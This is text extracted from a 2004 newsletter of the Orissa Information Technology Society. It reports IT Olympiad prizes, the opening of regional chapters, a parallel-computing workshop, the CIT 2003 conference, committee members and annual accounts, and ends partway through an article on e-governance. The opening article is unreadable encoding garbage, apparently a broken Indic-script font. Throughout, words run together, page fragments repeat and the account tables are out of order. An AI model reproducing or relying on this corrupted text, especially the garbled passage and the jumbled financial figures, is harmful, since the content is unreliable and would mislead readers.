[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 6: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

2

Prizes were distributed by the Chief GuestBikramjit Maitra In the senior category the firstsecond and third rank examinees were givencash prizes of Rs3000- Rs2000- andRs1000- respectively and consolation prizesof Rs500- each for the remaining eightexaminees above along with certificates In thejunior category also the first second and thirdrank examinees were given cash prizes ofRs3000- Rs2000- and Rs1000-respectively and consolation prizes of Rs500- each for the remaining nine examinees alongwith certificates Most of the prize winners tookthese prizes and for those who were absent theamounts along with the certificates were sentby courier

The Chief Guest addressed the gatheringemphasizing the relevance of IT in all phases ofour Society He also mentioned that Infosys hasalways wanted to increase the number ofselected candidates from Orissa if they satisfyminimal norms needed for it He mentioned thatparallel to Olympiad tests the selection processin Infosys takes into account not only thebackground knowledge of the candidates butalso their ability to think and adapt themselvesto learn new techniques in computer scienceGautam Parija also emphasized that for selectionin Infosys the ability of candidates as such shallalways be as important as the knowledge theyhave already acquired

Arun K Samantarai Administrator UtkalUniversity also focussed on the role of IT inSociety He particularly emphasized the needfor closer collaboration with industry to makesuch programs a success While all lauded thisactivity of oits Sri Samantarai emphasized thatassistance could be sought from Industry forsuch programs

S P Misra emphasized on two aspects foran extension of the Olympiad activity (i) Hementioned that there is an attempt to coordinatethis activity with a similar activity at all Indialevel so that they can avail of internationalcompetetion and that (ii) from next year we mayhave a short training program of the beststudents appearing in the olympiad On behalfof Infosys Mr Maitra assured that help for thiscan be available from them

There was then a tea break after which likelast year an interactive session was conductedin the presence of Bikramjit Maitra and GautamParija Here students asked many questionswhich were mainly answered by the visitorsalong with open house discussions participatedby many experts and students

The meeting ended with a vote of thanksby Ajit Nayak treasurer oits as the secretarywas absent

C Opening of SAMBALPUR CHAPTER inaugurated on 29112003

In october 2003 about eleven oits membersfrom sambalpur area wanted that we may openthe sambalpur chapter of oits The president thenlocated the earlier members around sambalpurarea and also asked some members outsideorissa whether they would like to join thischapter The executive committee which met on16112003 then approved that we may open thischapter as per article 6 of the bylaws andconvenor for this chapter B Patel of G M Collegesambalpur was intimated accordingly

The chapter was formally inaugurated byProf M C Dash vice-chancellor sambalpuruniversity in a function at G M College premiseson 29112003 Prof Arun Pujari of hyderabaduniversity was the chief speaker He gave anilluminating semi-technical talk on artificial

OITS-2004

3

intelligence The Secretary Dr B Patel talkedabout the interesting programs that were thereduring cit2003 and also about the futureprograms of the sambalpur chapter PrincipalG M College was the guest of honour and S PMisra president oits presided over the functionProf Pujari had also given a technical talk beforethe inauguration meeting

The chapter began with a seed money ofRs10800+Rs8000 with the first being from theregistration fees of fourteen members and thesecond being a donation by S P Misra as he hada speial attachment to sambalpur as his fatherProf Narayan Misra was the first principal ofGM College which was the beginning of highereducation in that area The name of the accountof sambalpur chapter is oits-sbp

The Secretary has subsequently intimatedthat the following are the office bearers of thechapter

1 President Prof S K Sanyal PrincipalUCE Burla

2 Vice-President Prof C R TripathyUCE Burla

3 Secretary Dr B Patel G M CollegeSambalpur

4 Treasurer Dr A P Dash G M CollegeSambalpur

D WORKSHOP ON PARALLEL COMPUTING AND BIOINFORMATICS

Organised by sambalpur chapter

22nd and 23rd March 2004

Here 141 delegates had registered for theworkshop Out of them there were 10 lifemembers of OIT-sbp 13 faculties from nearbycolleges rest being students from differentbranches like MCA Engnieering Msc comp scPhysics Mathematics Botany and Life Sciences

Professor Sudarsan Padhy UtkalUniversity Vanivihar delivered talks on parallelcomputing in three different sessions

On 220304 in the first session heillustrated the same through different exampleslike weather forecasting image processing etcemphasizing the importance of ParallelAlogorithms over serial Algorithms and takingdifferent examples developed the problems onParallel Algorithm In the second Session somemore developements in the problems of parallelalogorithms with multiprogramming and multiprocessing systems were considered

The uniqueness in the workshop waspractical demonstrations as needed Ajit kumarNayak Silicon Institute of TechnologyBhubaneswar demonstrated in two differentsessions about clustering of different workstations through Linux with the syntax to writeprograms using MPI The programmes weredemonstrated to the students This approachcreates a lot of interest among the students forthe problems of parallel algorithms

There were Two Tea Breaks and One lunchbreak for all the delegates

On 230304 Professor Padhy developed theproblems of parallel algorithms and proved theresults

Ajit Kumar Nayak demonstrated moreprograms of parallel algorithms to the delegates

In the after noon session Prof Padhydelivered a talk on Bio-Informatics which wasfollowed by another talk from Prof APDashGMCollege There were two Tea Breaks and onelunch for all the delegates

A feed back Form were circulated to alldeligates and their views were collected whichwas enthusiastic and positive

OITS-2004

4

The main feature of this workshop was itsmultidisciplinary nature with the delegates alsobelonging to diverse disciplines

E Opening of ROURKELA CHAPTER

In late december 2003 a letter was receivedfrom Prof Sourya Patnaik director rourkelainstitute of management studies (rims) with alist of ten new members from rims along with arequest to open a chapter of oits at rourkela TheInstitute was rated as among the top 40 B-schools and had MCA programs along withbusiness school programs We already had quitea few oits members in nit rourkela and it wasthought that such chapter shall be serving theaims and objectives of oits for the spread of ITin orissa

S Patnaik and sreekumar both of rims actedas convenors of the chapter They furtherrequested that they already had a program forfaculty improvement scheduled for 8th January2004 and it would be nice to inaugurate therourkela chapter of oits then with the facultyimprovement program being the first functionunder its auspices However as per rules oitsexecutive committee needs to approve theopening of a chapter for which time was notavailable Since opening of this chapter wastotally parallel to the opening of the sambalpurchapter the president rang up some executivecommittee members and with their approvalintimated Prof Patnaik that we may do so

The chapter was inaugurated on 8thjanuary 2004 by again Prof M C Dash vice-chancellor sambalpur university The functionwas attended by the president oits whowelcomed the delegates by Prof S Padhy whospoke about IT and oits Prof G Panda whoelaborated on many aspects of IT to emphasizethat IT is so interdisciplinary that it could hardly

be regarded as an independent subject ProfSourya Patnaik presided over the function andintimated that they had requested Prof Panda ofNIT Rourkela to be the president of the chapterand he had kindly agreed

One thing about Prof Pandas talkparticularly impressed me He said that he cantrain computer students to be self-reliant andthrough software development through thistraining earn their own livelihood at acomfortable level I do hope that through hisleadership this will come to happen in whichcase rourkela chapter will lead oits and all ITlovers about a very positive action

The afternoon programe was devoted to theworkshop on financial computation where anexpert from finance introduced the subject andProf Padhy talked about the computationalmodelling of the corresponding theories It wasattended by more than twenty-five participantsspread from different colleges in orissa It is verywell known that economic models have becomehighly mathematical and with the need for wide-scale data bases computational finance isbecoming a very important area of IT

The executive committee of oits met on1212004 where it discusssed about the openingof the rourkela chapter and approved the same

Rourkela chapter started with the seedmoney of Rs11210+Rs8000 the first abovebeing the money transferred from oitsmembership fees and the second being adonation by S P Misra who was Professor at(then) REC Rourkela for ten years He alsothought that the amount should be reasonablesince as per rules at least half of the aboveamount shall be kept as fixed deposit By theway this fixed deposit gives some stability tothe chapters where generally the members shall

OITS-2004

5

try to make the programs self-sustaining Thename of the bank account of the chapter is OITS-Rourkela

Rourkela chapter at present has seventeenmembers The secretary as below has intimatedthat the following office bearers have takencharge

1 President G Panda NIT Rourkela

2 Secretary D P Acharya RIMS

3 Treasurer Barnali Pradhan RIMS

Let us wish rourkela chapter all success

F Opening of BERHAMPUR CHAPTER

Some oits members of BerhampurUniversity NIST and NIC belonging toberhampur met on 29th March and resolved thatthey wish to open the berhampur chapter of oitsThey also elected the following members as officebearers

President M R Patra (BU)Vice-President R K Dash (NIC)Secretary Indraneel Mukhopadhyay (NIST)Treasurer S K Padhi (BU)

I received the above communication fromthe secretary on 3032004 We discussed thematter in the executive committee on 3132004and decided that the opening of the berhampurchapter be approved and that the same may befollowed up by the new executive committee

G OITS BULLETIN

OITS has started bringing out a Bulletinwith semi-technical articles with the first issue(December 2003) being inaugurated duringcit2003 It was initially thought that it would anyearly bulletin but then in the last general bodyit was decided that it may come out during Juneand December of every year This can be viewed

downloaded from the website This along withmany very interesting articles contains an articleby S P Misra indicating the gradual evolution ofoits

H CIT 2003

The Conference organised by OrissaInformation Technology Society (OITS) andSilicon Institute of Technology de facto extendedfrom 21st December to 25th December 2003 On21st there was a Symposium on IT andEducation mainly organised by the SiliconInstitute where there were seven speakers fromdifferent parts of India This was conducted byNeharika Vohra from IIM ahmedabad

In the afternoon the same day there wasan inauguration function for the ConferenceHere N R Mohanty Chairman HAL Bangalorewas the Chief Guest Damodar Acharya Vice-Chancellor Biju Patnaik University ofTechnology was the guest of honour and VinayDeshpande chairman Encore Software Pvt LtdBangalore was the Chief Speaker P K Dashwelcomed all Sudeshna Sarkar spoke about theConference and S P Misra gave a vote of thanksAll the three guests gave wonderful inspiringtalks with a common theme being to have a senseof confidence by all of us that things arehappening will happen and in IT or in otherfields we need not be second to any othercountry

The main Conference was from 22ndDecember to 24th December in Swosti PlazaBhubaneswar During the Conference therewere three keynote talks (by (i) S K TripathyUCR USA (ii) Y Pratt UT Arlington USA (iii)Sajal Das UT Arlington USA) eight invited talksand three advanced tutorials Around 230delegates from 12 countries including Indiaregistered for the Conference and 122 presented

OITS-2004

6

their papers in the different technical sessionsThere was also an industry session with thetheme as India sustaining leadership positionin the global IT market

On 24th afternoon the valedictory functiontook place as the last function of the ConferenceS P Misra President OITS conducted the sameThe program chairs briefly recapitulated thesalient features of the Conference and then asin the last year the results of the two best paperawards were given (i) Amiya K Pujari IT awardof Rs5000- and a certificate for the best paperamong all the papers submitted and presentedin the Conference went to Joydeep Ghosh ofUniversity of Texas Austin USA for the paperentitled A probabilistic approach to privacy-sensitive distributed data mining done incollaboration with Srujana Merigu (ii) NarayanMisra IT award of Rs4000- and a certificatefor the best paper among all the papers submittedfrom Orissa and presented in the Conferencewent to D P Das Silicon Inst of Tech bbsr forthe paper entitled Electricity distribution datamining using soft computing and modifiedwavelet analysis done in collaboration with PK Dash

On 25th December in addition to the threeadvanced tutorials during the Conference sixtutorials were organised two of six hourduration and four of three hour duration atHotel Swosti Plaza All the tutorials wereapproximately with sixty participants each andwere well received

Some more information about theconference can be had from the websiteI Organisation of CITs

In the general body meeting of december23rd 2003 the following observations regardingorganisation of cits were made It was decided

that CIT could be held outside orissa if we findorganiserssponsors However the frequencyof hosting outside orissa can not exceed once inthree years

It was also noted that cit2004 had beendecided by the existing steering committee to beat hyderabad and was appreciated by membersas the exposure of oits members to the IT scenarioin hyderabad will be helpful to take up similaractivities in orissa

Consistent with the spirit of the earlierCITs it was recommended by the general bodythat (i) for academic participants in cit2004 theregistration fees from inside India for academicsbe Rs2000- (ii) oits members as such shall havea discount of 25 and (iii) oits members whodo not have institutional or project support shallhave a discount of 50 subject to their certifyingto that effect

Steering Committee of CITs It was alsofelt desirable that the constitution of the steeringcommittee practised since december 1999 needsto be modified It was thought desirable to havefour permanent members here and some rotatingmembers After some discussions it was thoughtthat the permanent members may be (two fromUSA and two from India)

1 Prasant Mohapatra2 R N Mohapatra (Steering Chair)3 G Panda (NIT rourkela)4 S P Misra

It was also decided that the rotatingmembers of the nth cit shall be the generalchair(s) the program chairs and the organisingchair of the (n-1)th cit along with the incumbentpresident of oits during the period of theconference

Thus the general body resolution ofdecember 1999 now stands replaced by the

OITS-2004

7

above There is an article in the bulletinregarding the progressive evolution of the CITsregarding organisation matters

As is the procedure now these members ofthe steering committee shall seek suggestionsoffers from different mebersinstitutions as theymay think appropriate The steering committeelist shall be intimated to all the oits members assoon as possible

J Executive Committee of OITS

The following are the office bearers in theexecutive committee from 1st april 2004 to 31stMarch 2006 as decided in the general body on23122003

1 President J R Sahu2 Vice-President S Padhy3 Secretary S K Pradhan4 Secretary (overseas) P Mohapatra5 Joint Secretary S K Udgata (Berhampur)6 Joint Secretary B K Patel (Sambalpur)7 Treasurer A K Nayak

In addition the following additionalmembers were also elected to the executivecommittee

S P MisraB Misra (bsnl)A K Panda (ceo elmark)P K Behera (csa uu)S TorasiaS K MohantyA K Das (etdc)Chitta Baral (asu)J R Hota (KIIT Deemed University)

The executive committee as above willoperate from 1st april 2004 till 31st March 2006

K OITS Accounts

There were 48 new life members one donormember one institutional member and one morelife member who registered with the sambalpurchapter The total membership of OITS nowstands at abput 220 NIST conducting cit2001had not returned an advance of Rs20000-given to them they have now returned the samealong with an additional Rs2000- The balancefrom cit2002 amounting to about Rs195000- was a good addition to corpus of funds of oitsof which about Rs2000- was spent for auditingthe accounts of the same We particularlyappreciate the generous assistance of OrissaSociety of Americas of an amoount of aboutRs48600- to oits through personalcontributions Income from IT olympiad roughlybalanced the expenditure in conducting thesame however from OITS funds we have paidabout Rs20000- as prize money which wehope will focus on IT activities for the studentsAlso OITS transferred a sum of about Rs22000- from our corpus of funds to the corpus of fundsof sambalpur and rourkela chapters for openingof the two chapters and we hope the newexecutive committee will do the same forberhampur chapter

The balance with oits at present isRs68888862 of which about Rs636400- iskept in fixed deposits This account along withthe earlier accounts may be seen in appropriateoits website

About the author He is basically a physicist Fiveresearchers working with him have won the prestigiousAlexander von Humboldt fellowship His bookIntroduction to Supersymmetry and Supergravitywas a best seller for more than five years in amazoncomand has been recommended by Prof Witten of Instituteof Advanced Studies Princeton to his researchersNow engaged in organization of OITS

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

